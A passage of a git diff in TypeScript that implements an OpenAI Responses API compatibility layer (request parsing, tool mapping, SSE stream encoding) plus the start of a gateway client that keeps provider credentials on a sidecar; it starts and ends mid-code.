const fromSummary = (item.summary ?? []).map(c => c.text).join(""); + if (fromSummary) return fromSummary; + return (item.content ?? []).map(c => c.text).join(""); +} + +type InputBlockUnion = + | { type: "input_text"; text: string } + | { type: "text"; text: string } + | { type: "input_image"; detail?: "auto" | "low" | "high"; image_url?: string; file_id?: string } + | { type: "input_file"; file_id?: string; filename?: string; file_data?: string }; + +/** + * Walk an input message's content array and produce pi-ai's `TextContent[]`. + * `input_image`/`input_file` blocks become bracketed text placeholders since + * pi-ai's `ImageContent` only carries inline base64 data and we have no + * resolver for OpenAI `image_url` / `file_id` references. Logs once per kind. + */ +function inputContentParts(blocks: OpenAIResponsesInputContent[] | string | undefined): string | TextContent[] { + if (typeof blocks === "string") return blocks; + if (!blocks) return []; + const parts: TextContent[] = []; + for (const raw of blocks) { + const block = raw as InputBlockUnion; + if (block.type === "input_text" || block.type === "text") { + parts.push({ type: "text", text: block.text }); + } else if (block.type === "input_image") { + if (!warnedImageNotSupported) { + warnedImageNotSupported = true; + logger.warn("openai-responses-server: input_image dropped (no pi-ai bridge for image_url/file_id)", { + hasUrl: typeof block.image_url === "string", + hasFileId: typeof block.file_id === "string", + }); + } + const ref = block.image_url ?? block.file_id ?? "?"; + parts.push({ type: "text", text: `[image: ${ref}]` }); + } else if (block.type === "input_file") { + if (!warnedFileNotSupported) { + warnedFileNotSupported = true; + logger.warn("openai-responses-server: input_file dropped (no pi-ai bridge for file_id/file_data)", { + hasFileId: typeof block.file_id === "string", + hasFileData: typeof block.file_data === "string", + }); + } + const ref = block.file_id ?? block.filename ?? "?"; + parts.push({ type: "text", text: `[file: ${ref}]` }); + } + } + return parts.length === 1 ? parts[0].text : parts; +} + +type OutputBlockUnion = + | { type: "output_text"; text: string } + | { type: "text"; text: string } + | { type: "refusal"; refusal: string }; + +function outputTextOf(blocks: OpenAIResponsesOutputContent[] | string | undefined): TextContent[] { + if (typeof blocks === "string") return blocks.length > 0 ? [{ type: "text", text: blocks }] : []; + if (!blocks) return []; + const out: TextContent[] = []; + for (const raw of blocks) { + const block = raw as OutputBlockUnion; + if (block.type === "output_text" || block.type === "text") { + out.push({ type: "text", text: block.text }); + } else if (block.type === "refusal") { + // Preserve the refusal reason so history replay still carries it. + out.push({ type: "text", text: `[refusal: ${block.refusal}]` }); + } + } + return out; +} + +// The schema accepts a much wider tool_choice union than the SDK type so the +// walker narrows against the local schema shape. +type ParsedToolChoice = + | "auto" + | "none" + | "required" + | { type: "function"; name: string } + | { type: "custom"; name: string } + | { + type: + | "web_search_preview" + | "file_search" + | "computer_use_preview" + | "code_interpreter" + | "image_generation" + | "mcp"; + } + | { type: "allowed_tools"; mode: "auto" | "required"; tools: Array<{ type: string; name?: string }> }; + +function mapToolChoice(value: ParsedToolChoice | undefined): ParsedRequest["options"]["toolChoice"] { + if (value === undefined) return undefined; + if (value === "auto" || value === "none" || value === "required") return value; + if ("type" in value) { + // `custom` (codex apply_patch) and `function` both resolve to the same + // pi-ai shape: pi-ai's dispatcher matches `Tool.name` AND `customWireName`, + // so passing the wire name works for either. + if (value.type === "function" || value.type === "custom") return { name: value.name }; + // Hosted tools + allowed_tools — we don't surface these to pi-ai; fall + // back to letting the model pick a tool freely. + return "auto"; + } + return undefined; +} + +function buildTools(tools: Array<OpenAIResponsesTool | { type: string }> | undefined): Tool[] | undefined { + if (!tools) return undefined; + const out: Tool[] = []; + for (const t of tools) { + // Skip non-function tools (web_search, file_search, …). + if (t.type !== "function") continue; + const fn = t as Extract<OpenAIResponsesTool, { type: "function" }>; + const tool: Tool = { + name: fn.name, + description: fn.description ?? "", + parameters: (fn.parameters ?? {}) as Tool["parameters"], + }; + if (fn.strict !== undefined && fn.strict !== null) tool.strict = fn.strict; + out.push(tool); + } + return out.length > 0 ? out : undefined; +} + +function ensureAssistantPlaceholder(messages: Message[], modelId: string, now: number): AssistantMessage { + const last = messages[messages.length - 1]; + if (last && last.role === "assistant") return last; + const placeholder: AssistantMessage = { + role: "assistant", + content: [], + api: "openai-responses", + provider: "openai", + model: modelId, + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "stop", + timestamp: now, + }; + messages.push(placeholder); + return placeholder; +} + +/** Flatten a function_call_output array form (text + refusal) into a single string. */ +function flattenFunctionOutputArray(blocks: readonly unknown[]): string { + const parts: string[] = []; + for (const raw of blocks) { + if (!isObj(raw)) continue; + const t = raw.type; + if (t === "output_text" || t === "text") { + const text = asString(raw.text); + if (text) parts.push(text); + } else if (t === "refusal") { + const refusal = asString(raw.refusal); + if (refusal) parts.push(`[refusal: ${refusal}]`); + } + } + return parts.join(""); +} + +// ─── parseRequest ─────────────────────────────────────────────────────────── + +export function parseRequest(body: unknown, headers?: Headers): ParsedRequest { + // Header capture is centralized in `auth-gateway/server.ts` (the + // allow-listed set lands on `options.headers` automatically). We also + // consult `headers` here to populate `options.promptCacheKey` when the + // client signals a cache identity outside the body — see the + // `resolvePromptCacheKey` call further down. + + const parsed = openaiResponsesRequestSchema.safeParse(body); + if (!parsed.success) { + throw new Error(`openai-responses: ${parsed.error.message}`); + } + const data = parsed.data; + + const now = Date.now(); + const messages: Message[] = []; + const systemPrompt: string[] = []; + + if (typeof data.instructions === "string" && data.instructions.length > 0) { + systemPrompt.push(data.instructions); + } + + if (typeof data.input === "string") { + messages.push({ role: "user", content: data.input, timestamp: now }); + } else if (data.input) { + for (const item of data.input) { + // Items may omit `type` and rely on `role` (the convenience shape). + const effectiveType = item.type ?? ("role" in item ? "message" : undefined); + if (effectiveType === "message") { + const msg = item as { + role?: string; + content?: OpenAIResponsesInputContent[] | OpenAIResponsesOutputContent[] | string; + }; + switch (msg.role) { + case "system": { + const text = inputContentParts(msg.content as OpenAIResponsesInputContent[] | string | undefined); + const flat = typeof text === "string" ? text : text.map(p => p.text).join(""); + if (flat.length > 0) systemPrompt.push(flat); + break; + } + case "user": + case "developer": { + const content = inputContentParts(msg.content as OpenAIResponsesInputContent[] | string | undefined); + messages.push({ role: msg.role, content, timestamp: now }); + break; + } + case "assistant": { + const parts = outputTextOf(msg.content as OpenAIResponsesOutputContent[] | string | undefined); + messages.push({ + role: "assistant", + content: parts, + api: "openai-responses", + provider: "openai", + model: data.model, + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "stop", + timestamp: now, + }); + break; + } + } + continue; + } + if (effectiveType === "reasoning") { + const reasoning = item as OpenAIResponsesReasoningItem; + const text = extractReasoningTextFromItem(reasoning); + const thinking: ThinkingContent = { + type: "thinking", + thinking: text, + thinkingSignature: JSON.stringify(reasoning), + ...(reasoning.id ? { itemId: reasoning.id } : {}), + }; + ensureAssistantPlaceholder(messages, data.model, now).content.push(thinking); + continue; + } + if (effectiveType === "function_call") { + const call = item as OpenAIResponsesFunctionCallItem; + const argsRaw = call.arguments ?? "{}"; + let args: Record<string, unknown>; + try { + const parsedArgs: unknown = JSON.parse(argsRaw); + args = isObj(parsedArgs) ? parsedArgs : {}; + } catch { + throw new Error(`openai-responses: function_call ${call.call_id} has invalid JSON arguments`); + } + const toolCall: ToolCall = { + type: "toolCall", + id: call.call_id, + name: call.name, + arguments: args, + ...(call.id ? { thoughtSignature: call.id } : {}), + }; + ensureAssistantPlaceholder(messages, data.model, now).content.push(toolCall); + continue; + } + if (effectiveType === "custom_tool_call") { + const call = item as { id?: string; call_id: string; name: string; input: string }; + // Custom tools carry a raw input string. We stash it in `arguments.input` + // matching pi-ai's openai-responses-shared convention, and tag the call + // with `customWireName` so encoders re-emit it as `custom_tool_call`. + const toolCall: ToolCall = { + type: "toolCall", + id: call.call_id, + name: call.name, + arguments: { input: call.input ?? "" }, + customWireName: call.name, + ...(call.id ? { thoughtSignature: call.id } : {}), + }; + ensureAssistantPlaceholder(messages, data.model, now).content.push(toolCall); + continue; + } + if (effectiveType === "function_call_output") { + const output = item as OpenAIResponsesFunctionCallOutputItem; + const toolName = findToolNameById(messages, output.call_id); + const text = + typeof output.output === "string" + ? output.output + : Array.isArray(output.output) + ? flattenFunctionOutputArray(output.output) + : ""; + messages.push({ + role: "toolResult", + toolCallId: output.call_id, + toolName, + content: [{ type: "text", text }], + isError: false, + timestamp: now, + }); + continue; + } + if (effectiveType === "custom_tool_call_output") { + const output = item as { call_id: string; output: string }; + const toolName = findToolNameById(messages, output.call_id); + messages.push({ + role: "toolResult", + toolCallId: output.call_id, + toolName, + content: [{ type: "text", text: output.output ?? "" }], + isError: false, + timestamp: now, + }); + } + // Other item types are tolerated but not bridged. + } + } + + const tools = buildTools(data.tools); + const context: Context = { + ...(systemPrompt.length > 0 ? { systemPrompt } : {}), + messages, + ...(tools ? { tools } : {}), + }; + + const options: ParsedRequest["options"] = {}; + if (data.max_output_tokens !== undefined) options.maxOutputTokens = data.max_output_tokens; + if (data.temperature !== undefined) options.temperature = data.temperature; + if (data.top_p !== undefined) options.topP = data.top_p; + if (data.stop !== undefined && data.stop !== null) { + options.stopSequences = typeof data.stop === "string" ? [data.stop] : data.stop; + } + const toolChoice = mapToolChoice(data.tool_choice as ParsedToolChoice | undefined); + if (toolChoice !== undefined) options.toolChoice = toolChoice; + if (data.reasoning?.effort && isReasoningEffort(data.reasoning.effort)) { + options.reasoning = data.reasoning.effort; + } + // OpenAI summary: `none` → suppress; `auto`/`concise`/`detailed` → request + // visible summary. pi-ai has no per-level plumbing — log once and let the + // provider default kick in. + if (data.reasoning?.summary === "none") { + options.hideThinkingSummary = true; + } else if ( + data.reasoning?.summary === "auto" || + data.reasoning?.summary === "concise" || + data.reasoning?.summary === "detailed" + ) { + if (!warnedReasoningSummaryLevel) { + warnedReasoningSummaryLevel = true; + logger.debug("openai-responses-server: reasoning.summary level not differentiated", { + level: data.reasoning.summary, + }); + } + } + if (data.service_tier !== undefined && isServiceTier(data.service_tier)) { + options.serviceTier = data.service_tier; + } + if (data.presence_penalty !== undefined) options.presencePenalty = data.presence_penalty; + if (data.frequency_penalty !== undefined) options.frequencyPenalty = data.frequency_penalty; + if (data.parallel_tool_calls !== undefined) options.parallelToolCalls = data.parallel_tool_calls; + const cacheKey = resolvePromptCacheKey(body, headers); + if (cacheKey !== undefined) options.promptCacheKey = cacheKey; + if (data.previous_response_id !== undefined) options.previousResponseId = data.previous_response_id; + if (data.user !== undefined) options.user = data.user; + if (isObj(data.metadata)) options.metadata = data.metadata; + // `store` is a stateful-storage hint that omp's gateway doesn't honour; + // silently accepted by the schema. No typed slot — drop. + + return { + modelId: data.model, + context, + stream: data.stream === true, + options, + }; +} + +function findToolNameById(messages: Message[], callId: string): string { + for (let i = messages.length - 1; i >= 0; i--) { + const m = messages[i]; + if (m.role !== "assistant") continue; + for (const c of m.content) { + if (c.type === "toolCall" && c.id === callId) return c.name; + } + } + return ""; +} + +// ─── formatError ──────────────────────────────────────────────────────────── + +export function formatError(status: number, type: string, message: string): Response { + return new Response(JSON.stringify({ error: { message, type } }), { + status, + headers: { "Content-Type": "application/json" }, + }); +} + +// ─── output item builders (shared by streaming + non-streaming encoders) ──── + +type ReasoningOutputItem = { + type: "reasoning"; + id: string; + summary: Array<{ type: "summary_text"; text: string }>; +} & Record<string, unknown>; + +type MessageOutputItem = { + type: "message"; + id: string; + role: "assistant"; + status: "completed"; + content: Array<{ type: "output_text"; text: string; annotations: never[] }>; +}; + +type FunctionCallOutputItem = { + type: "function_call"; + id: string; + call_id: string; + name: string; + arguments: string; + status: "completed"; +}; + +type CustomToolCallOutputItem = { + type: "custom_tool_call"; + id: string; + call_id: string; + name: string; + input: string; + status: "completed"; +}; + +type OutputItem = ReasoningOutputItem | MessageOutputItem | FunctionCallOutputItem | CustomToolCallOutputItem; + +type ResponseStatus = "completed" | "in_progress" | "failed" | "incomplete"; + +function responseStatusForStopReason(message: AssistantMessage): ResponseStatus { + if (message.stopReason === "length") return "incomplete"; + if (message.stopReason === "error" || message.stopReason === "aborted") return "failed"; + return "completed"; +} + +function buildReasoningItem(part: ThinkingContent): ReasoningOutputItem { + const baseId = part.itemId ?? makeReasoningId(); + if (part.thinkingSignature) { + try { + const sigParsed: unknown = JSON.parse(part.thinkingSignature); + if (isObj(sigParsed) && sigParsed.type === "reasoning") { + const id = part.itemId ?? asString(sigParsed.id) ?? makeReasoningId(); + // Preserve any extra fields (encrypted_content, …) the original carried, + // but normalize the summary into the canonical `{type, text}[]` shape. + const merged: Record<string, unknown> = { ...sigParsed, type: "reasoning", id }; + merged.summary = [{ type: "summary_text", text: part.thinking }]; + // `content[]` is the encrypted/raw side-channel; leave whatever was + // already there. If absent, omit — real OpenAI only emits `content[]` + // when `include=['reasoning.encrypted_content']` is set. + return merged as ReasoningOutputItem; + } + } catch { + // Not a serialized Responses reasoning item; fall through to fresh build. + } + } + return { + type: "reasoning", + id: baseId, + summary: [{ type: "summary_text", text: part.thinking }], + }; +} + +function reasoningItemId(part: ThinkingContent): string { + if (part.itemId) return part.itemId; + if (part.thinkingSignature) { + try { + const sigParsed: unknown = JSON.parse(part.thinkingSignature); + if (isObj(sigParsed)) { + const id = asString(sigParsed.id); + if (id) return id; + } + } catch { + // Not a serialized Responses reasoning item. + } + } + return makeReasoningId(); +} + +/** + * Walk the assistant content array and group consecutive TextContent into a + * single message item; each ThinkingContent / ToolCall is its own item. + */ +function buildOutputItems(message: AssistantMessage): OutputItem[] { + const out: OutputItem[] = []; + let pendingMessage: MessageOutputItem | null = null; + const flushMessage = () => { + if (pendingMessage) { + out.push(pendingMessage); + pendingMessage = null; + } + }; + + for (const part of message.content) { + if (part.type === "text") { + if (!pendingMessage) { + pendingMessage = { + type: "message", + id: makeMsgId(), + role: "assistant", + status: "completed", + content: [], + }; + } + pendingMessage.content.push({ type: "output_text", text: part.text, annotations: [] }); + } else if (part.type === "thinking") { + flushMessage(); + out.push(buildReasoningItem(part)); + } else if (part.type === "toolCall") { + flushMessage(); + if (part.customWireName) { + const rawInput = typeof part.arguments?.input === "string" ? (part.arguments.input as string) : ""; + out.push({ + type: "custom_tool_call", + id: part.thoughtSignature ?? makeCustomCallId(), + call_id: part.id, + name: part.customWireName, + input: rawInput, + status: "completed", + }); + } else { + out.push({ + type: "function_call", + id: part.thoughtSignature ?? makeFuncCallId(), + call_id: part.id, + name: part.name, + arguments: JSON.stringify(part.arguments ?? {}), + status: "completed", + }); + } + } + // RedactedThinking / Image are silently dropped — no direct Responses wire representation. + } + flushMessage(); + return out; +} + +function buildUsage(message: AssistantMessage): Record<string, unknown> { + const u = message.usage; + const inputTokens = u.input + u.cacheRead + u.cacheWrite; + return { + input_tokens: inputTokens, + input_tokens_details: { cached_tokens: u.cacheRead }, + output_tokens: u.output, + output_tokens_details: { reasoning_tokens: u.reasoningTokens ?? 0 }, + total_tokens: inputTokens + u.output, + }; +} + +function buildResponseEnvelope( + message: AssistantMessage, + requestedModelId: string, + id: string, + status: ResponseStatus, + items: OutputItem[] | [], + usage: Record<string, unknown> | null, +): Record<string, unknown> { + return { + id, + object: "response", + created_at: Math.floor(message.timestamp / 1000), + status, + model: requestedModelId, + output: items, + usage, + ...(status === "incomplete" ? { incomplete_details: { reason: "max_output_tokens" } } : {}), + ...(status === "failed" ? { error: { message: message.errorMessage ?? "response failed" } } : {}), + }; +} + +// ─── encodeResponse (non-streaming) ───────────────────────────────────────── + +export function encodeResponse(message: AssistantMessage, requestedModelId: string): Record<string, unknown> { + const items = buildOutputItems(message); + return buildResponseEnvelope( + message, + requestedModelId, + makeRespId(), + responseStatusForStopReason(message), + items, + buildUsage(message), + ); +} + +// ─── encodeStream ─────────────────────────────────────────────────────────── + +interface OpenMessage { + kind: "message"; + itemId: string; + outputIndex: number; + contentIndex: number; + currentPartText: string; + content: Array<{ type: "output_text"; text: string; annotations: never[] }>; +} +interface OpenReasoning { + kind: "reasoning"; + itemId: string; + outputIndex: number; + reasoningText: string; +} +interface OpenFunctionCall { + kind: "function_call"; + itemId: string; + outputIndex: number; + callId: string; + name: string; + argsText: string; + /** Set when the underlying ToolCall is a custom-tool emission. */ + customWireName?: string; +} +type OpenItem = OpenMessage | OpenReasoning | OpenFunctionCall; + +function sseEvent(name: string, data: unknown): string { + return `event: ${name}\ndata: ${JSON.stringify(data)}\n\n`; +} + +export function encodeStream( + events: AssistantMessageEventStream, + requestedModelId: string, +): ReadableStream<Uint8Array> { + const encoder = new TextEncoder(); + const responseId = makeRespId(); + let sequenceNumber = 0; + const seq = () => sequenceNumber++; + + return new ReadableStream<Uint8Array>({ + async start(controller) { + const emit = (name: string, data: Record<string, unknown>) => { + controller.enqueue(encoder.encode(sseEvent(name, { type: name, sequence_number: seq(), ...data }))); + }; + const emitDone = () => controller.enqueue(encoder.encode("data: [DONE]\n\n")); + + let createdAt = Math.floor(Date.now() / 1000); + let outputIndex = 0; + const state: { open: OpenItem | null } = { open: null }; + const finishedItems: OutputItem[] = []; + + const responseSnapshot = (status: ResponseStatus, output: OutputItem[] | []) => ({ + id: responseId, + object: "response", + created_at: createdAt, + status, + model: requestedModelId, + output, + usage: null, + }); + + const openMessage = (): OpenMessage => { + const itemId = makeMsgId(); + const item = { + type: "message" as const, + id: itemId, + status: "in_progress", + role: "assistant" as const, + content: [] as Array<{ type: "output_text"; text: string; annotations: never[] }>, + }; + emit("response.output_item.added", { output_index: outputIndex, item }); + const next: OpenMessage = { + kind: "message", + itemId, + outputIndex, + contentIndex: 0, + currentPartText: "", + content: [], + }; + state.open = next; + return next; + }; + + const openReasoning = (partial: AssistantMessage, contentIndex: number): OpenReasoning => { + const part = partial.content[contentIndex]; + const itemId = part && part.type === "thinking" ? reasoningItemId(part) : makeReasoningId(); + const item = { + type: "reasoning" as const, + id: itemId, + summary: [] as Array<{ type: "summary_text"; text: string }>, + }; + emit("response.output_item.added", { output_index: outputIndex, item }); + // Open the summary part. Real OpenAI streams summary text in the + // canonical `reasoning_summary_*` lifecycle; pi-ai's own decoder + // reads `summary[].text` from the eventual `output_item.done`. + emit("response.reasoning_summary_part.added", { + item_id: itemId, + output_index: outputIndex, + summary_index: 0, + part: { type: "summary_text", text: "" }, + }); + const next: OpenReasoning = { kind: "reasoning", itemId, outputIndex, reasoningText: "" }; + state.open = next; + return next; + }; + + const openToolCall = (partial: AssistantMessage, contentIndex: number): OpenFunctionCall => { + const part = partial.content[contentIndex]; + const tc = part && part.type === "toolCall" ? part : undefined; + const customWireName: string | undefined = + tc && typeof tc.customWireName === "string" && tc.customWireName.length > 0 + ? tc.customWireName + : undefined; + const isCustom = customWireName !== undefined; + const itemId = tc?.thoughtSignature ?? (isCustom ? makeCustomCallId() : makeFuncCallId()); + const callId = tc?.id ?? ""; + const name = customWireName ?? tc?.name ?? ""; + const item = isCustom + ? { + type: "custom_tool_call" as const, + id: itemId, + call_id: callId, + name, + input: "", + status: "in_progress", + } + : { + type: "function_call" as const, + id: itemId, + call_id: callId, + name, + arguments: "", + status: "in_progress", + }; + emit("response.output_item.added", { output_index: outputIndex, item }); + const next: OpenFunctionCall = { + kind: "function_call", + itemId, + outputIndex, + callId, + name, + argsText: "", + ...(isCustom ? { customWireName } : {}), + }; + state.open = next; + return next; + }; + + const closeOpen = () => { + if (!state.open) return; + if (state.open.kind === "message") { + const item = { + type: "message", + id: state.open.itemId, + status: "completed", + role: "assistant", + content: state.open.content, + }; + emit("response.output_item.done", { output_index: state.open.outputIndex, item }); + finishedItems.push({ + type: "message", + id: state.open.itemId, + role: "assistant", + status: "completed", + content: state.open.content, + }); + } else if (state.open.kind === "reasoning") { + const summary = [{ type: "summary_text" as const, text: state.open.reasoningText ?? "" }]; + const item = { + type: "reasoning", + id: state.open.itemId, + summary, + }; + emit("response.output_item.done", { output_index: state.open.outputIndex, item }); + finishedItems.push({ + type: "reasoning", + id: state.open.itemId, + summary, + }); + } else { + const text = state.open.argsText ?? ""; + if (state.open.customWireName) { + const item = { + type: "custom_tool_call", + id: state.open.itemId, + call_id: state.open.callId ?? "", + name: state.open.customWireName, + input: text, + status: "completed", + }; + emit("response.output_item.done", { output_index: state.open.outputIndex, item }); + finishedItems.push({ + type: "custom_tool_call", + id: state.open.itemId, + call_id: state.open.callId ?? "", + name: state.open.customWireName, + input: text, + status: "completed", + }); + } else { + const item = { + type: "function_call", + id: state.open.itemId, + call_id: state.open.callId ?? "", + name: state.open.name ?? "", + arguments: text, + status: "completed", + }; + emit("response.output_item.done", { output_index: state.open.outputIndex, item }); + finishedItems.push({ + type: "function_call", + id: state.open.itemId, + call_id: state.open.callId ?? "", + name: state.open.name ?? "", + arguments: text, + status: "completed", + }); + } + } + outputIndex++; + state.open = null; + }; + + try { + let finalMessage: AssistantMessage | null = null; + let failureMessage: AssistantMessage | null = null; + + for await (const ev of events) { + switch (ev.type) { + case "start": { + createdAt = Math.floor((ev.partial.timestamp || Date.now()) / 1000); + // response.created — initial envelope. + controller.enqueue( + encoder.encode( + sseEvent("response.created", { + type: "response.created", + sequence_number: seq(), + response: responseSnapshot("in_progress", []), + }), + ), + ); + // response.in_progress — mirrors real OpenAI; some clients gate + // on it before reading items. + controller.enqueue( + encoder.encode( + sseEvent("response.in_progress", { + type: "response.in_progress", + sequence_number: seq(), + response: responseSnapshot("in_progress", []), + }), + ), + ); + break; + } + case "text_start": { + let cur: OpenMessage; + if (state.open && state.open.kind === "message") { + // continue same message item, new content part + cur = state.open; + cur.currentPartText = ""; + } else { + if (state.open) closeOpen(); + cur = openMessage(); + } + const part = { type: "output_text", text: "", annotations: [] as never[] }; + emit("response.content_part.added", { + item_id: cur.itemId, + output_index: cur.outputIndex, + content_index: cur.contentIndex, + part, + }); + break; + } + case "text_delta": { + if (!state.open || state.open.kind !== "message") break; + const cur: OpenMessage = state.open; + cur.currentPartText += ev.delta; + emit("response.output_text.delta", { + item_id: cur.itemId, + output_index: cur.outputIndex, + content_index: cur.contentIndex, + delta: ev.delta, + logprobs: [], + }); + // TODO: when pi-ai surfaces output_text annotations + // (web_search citations, …), emit + // `response.output_text.annotation.added` here. + break; + } + case "text_end": { + if (!state.open || state.open.kind !== "message") break; + const cur: OpenMessage = state.open; + const text = ev.content ?? cur.currentPartText; + emit("response.output_text.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + content_index: cur.contentIndex, + text, + logprobs: [], + }); + cur.content.push({ type: "output_text", text, annotations: [] }); + emit("response.content_part.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + content_index: cur.contentIndex, + part: { type: "output_text", text, annotations: [] }, + }); + cur.contentIndex += 1; + cur.currentPartText = ""; + break; + } + case "thinking_start": { + if (state.open) closeOpen(); + openReasoning(ev.partial, ev.contentIndex); + break; + } + case "thinking_delta": { + if (!state.open || state.open.kind !== "reasoning") break; + const cur: OpenReasoning = state.open; + cur.reasoningText += ev.delta; + emit("response.reasoning_summary_text.delta", { + item_id: cur.itemId, + output_index: cur.outputIndex, + summary_index: 0, + delta: ev.delta, + }); + break; + } + case "thinking_end": { + if (!state.open || state.open.kind !== "reasoning") break; + const cur: OpenReasoning = state.open; + const text = ev.content ?? cur.reasoningText; + cur.reasoningText = text; + emit("response.reasoning_summary_text.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + summary_index: 0, + text, + }); + emit("response.reasoning_summary_part.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + summary_index: 0, + part: { type: "summary_text", text }, + }); + closeOpen(); + break; + } + case "toolcall_start": { + if (state.open) closeOpen(); + openToolCall(ev.partial, ev.contentIndex); + break; + } + case "toolcall_delta": { + if (!state.open || state.open.kind !== "function_call") break; + const cur: OpenFunctionCall = state.open; + cur.argsText += ev.delta; + if (cur.customWireName) { + emit("response.custom_tool_call_input.delta", { + item_id: cur.itemId, + output_index: cur.outputIndex, + delta: ev.delta, + }); + } else { + emit("response.function_call_arguments.delta", { + item_id: cur.itemId, + output_index: cur.outputIndex, + delta: ev.delta, + }); + } + break; + } + case "toolcall_end": { + if (!state.open || state.open.kind !== "function_call") break; + const cur: OpenFunctionCall = state.open; + // Promote possibly-late info from the canonical ToolCall. + const tc = ev.toolCall; + if (tc.customWireName && !cur.customWireName) cur.customWireName = tc.customWireName; + if (tc.thoughtSignature) cur.itemId = tc.thoughtSignature; + cur.callId = tc.id; + cur.name = cur.customWireName ?? tc.name; + if (cur.customWireName) { + // Custom tool: raw input string. Streamed deltas accumulated + // the wire-level body; fall back to `arguments.input` from + // the finalized ToolCall when nothing streamed (rare). + const rawInput = + cur.argsText || + (typeof tc.arguments?.input === "string" ? (tc.arguments.input as string) : ""); + cur.argsText = rawInput; + emit("response.custom_tool_call_input.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + input: rawInput, + name: cur.name, + }); + } else { + // Standard JSON tool: arguments object on the omp side, the + // wire wants the JSON string the model emitted (= streamed deltas). + const argsJson = cur.argsText || JSON.stringify(tc.arguments ?? {}); + cur.argsText = argsJson; + emit("response.function_call_arguments.done", { + item_id: cur.itemId, + output_index: cur.outputIndex, + arguments: argsJson, + name: cur.name, + }); + } + closeOpen(); + break; + } + case "done": { + finalMessage = ev.message; + break; + } + case "error": { + failureMessage = ev.error; + break; + } + } + } + + if (failureMessage) { + if (state.open) closeOpen(); + controller.enqueue( + encoder.encode( + sseEvent("response.failed", { + type: "response.failed", + sequence_number: seq(), + response: { + ...responseSnapshot("failed", finishedItems), + error: { message: failureMessage.errorMessage ?? "stream failed" }, + }, + }), + ), + ); + emitDone(); + controller.close(); + return; + } + + if (state.open) closeOpen(); + const message = finalMessage ?? ((await events.result().catch(() => null)) as AssistantMessage | null); + + // Build the canonical output from the final message so non-streaming + // readers see the exact same shape they'd get from encodeResponse(). + const items = message ? buildOutputItems(message) : finishedItems; + const usage = message ? buildUsage(message) : null; + const status = message ? responseStatusForStopReason(message) : "completed"; + const terminalEvent = + status === "incomplete" + ? "response.incomplete" + : status === "failed" + ? "response.failed" + : "response.completed"; + controller.enqueue( + encoder.encode( + sseEvent(terminalEvent, { + type: terminalEvent, + sequence_number: seq(), + response: { + id: responseId, + object: "response", + created_at: createdAt, + status, + model: requestedModelId, + output: items, + usage, + ...(status === "incomplete" ? { incomplete_details: { reason: "max_output_tokens" } } : {}), + ...(status === "failed" + ? { error: { message: message?.errorMessage ?? "response failed" } } + : {}), + }, + }), + ), + ); + emitDone(); + controller.close(); + } catch (err) { + controller.enqueue( + encoder.encode( + sseEvent("response.failed", { + type: "response.failed", + sequence_number: seq(), + response: { + id: responseId, + object: "response", + created_at: Math.floor(Date.now() / 1000), + status: "failed", + model: requestedModelId, + output: [], + error: { message: err instanceof Error ? err.message : String(err) }, + }, + }), + ), + ); + emitDone(); + controller.close(); + } + }, + }); +} diff --git a/packages/ai/src/providers/openai-responses.ts b/packages/ai/src/providers/openai-responses.ts index 0e7cbb64a..63bbcfedc 100644 --- a/packages/ai/src/providers/openai-responses.ts +++ b/packages/ai/src/providers/openai-responses.ts @@ -171,6 +171,7 @@ type OpenAIResponsesSamplingParams = ResponseCreateParamsStreaming & { min_p?: number; presence_penalty?: number; repetition_penalty?: number; + stream_options?: { include_obfuscation?: boolean }; }; /** @@ -404,9 +405,14 @@ function buildParams( prompt_cache_key: promptCacheKey, prompt_cache_retention: promptCacheKey ? getPromptCacheRetention(model.baseUrl, cacheRetention) : undefined, store: false, + stream_options: model.provider === "openai" ? { include_obfuscation: false } : undefined, }; applyCommonResponsesSamplingParams(params, options, model.provider); + // TODO: openai responses has no top-level `stop`/`stop_sequences`; surface via reasoning.stop? + // `StreamOptions.stopSequences` is intentionally dropped for this provider. + // TODO: openai responses has no top-level `frequency_penalty` field as of the current SDK; + // `StreamOptions.frequencyPenalty` is intentionally dropped for this provider. if (context.tools) { params.tools = convertTools(context.tools, supportsStrictMode(model), model); diff --git a/packages/ai/src/providers/pi-native-client.ts b/packages/ai/src/providers/pi-native-client.ts new file mode 100644 index 000000000..b5df79636 --- /dev/null +++ b/packages/ai/src/providers/pi-native-client.ts @@ -0,0 +1,228 @@ +/** + * Client half of the pi-native auth-gateway protocol. + * + * Dispatches a {@link streamSimple}-shaped request to an `omp auth-gateway` + * via `POST /v1/pi/stream`, reads the SSE event stream back, and pushes the + * parsed events into a local {@link AssistantMessageEventStream} — the same + * stream type every other provider client produces. Callers downstream of + * `streamSimple` cannot tell whether the events came from a real provider + * SDK or from a gateway hop; they consume `AssistantMessageEvent`s either + * way. + * + * Activated when a {@link Model} has `transport: "pi-native"` set; the + * dispatch hook lives in `streamSimple()` (see `../stream.ts`). Used by + * containerized omp deployments (robomp slots, the swarm extension) that + * route every LLM call through a credential-holding sidecar so the slot + * itself stays credential-free. + */ +import { readSseJson } from "@oh-my-pi/pi-utils"; +import type { + Api, + AssistantMessage, + AssistantMessageEvent, + AssistantMessageEventStream as AssistantMessageEventStreamType, + Context, + Model, + SimpleStreamOptions, +} from "../types"; +import { AssistantMessageEventStream } from "../utils/event-stream"; + +/** + * Fields that must not cross the wire — either non-serializable (functions, + * `AbortSignal`, the provider-session `Map`) or server-controlled + * (`apiKey`, which the gateway injects from its own credential store; the + * client's `apiKey` is the gateway *bearer*, sent in the `Authorization` + * header rather than the request body). + */ +const NON_WIRE_KEYS = new Set<keyof SimpleStreamOptions>([ + "signal", + "apiKey", + "fetch", + "onPayload", + "onResponse", + "onSseEvent", + "execHandlers", + "cursorExecHandlers", + "cursorOnToolResult", + "providerSessionState", +]); + +function buildWireOptions(options: SimpleStreamOptions | undefined): Record<string, unknown> { + if (!options) return {}; + const wire: Record<string, unknown> = {}; + for (const [k, v] of Object.entries(options)) { + if (v === undefined) continue; + if (NON_WIRE_KEYS.has(k as keyof SimpleStreamOptions)) 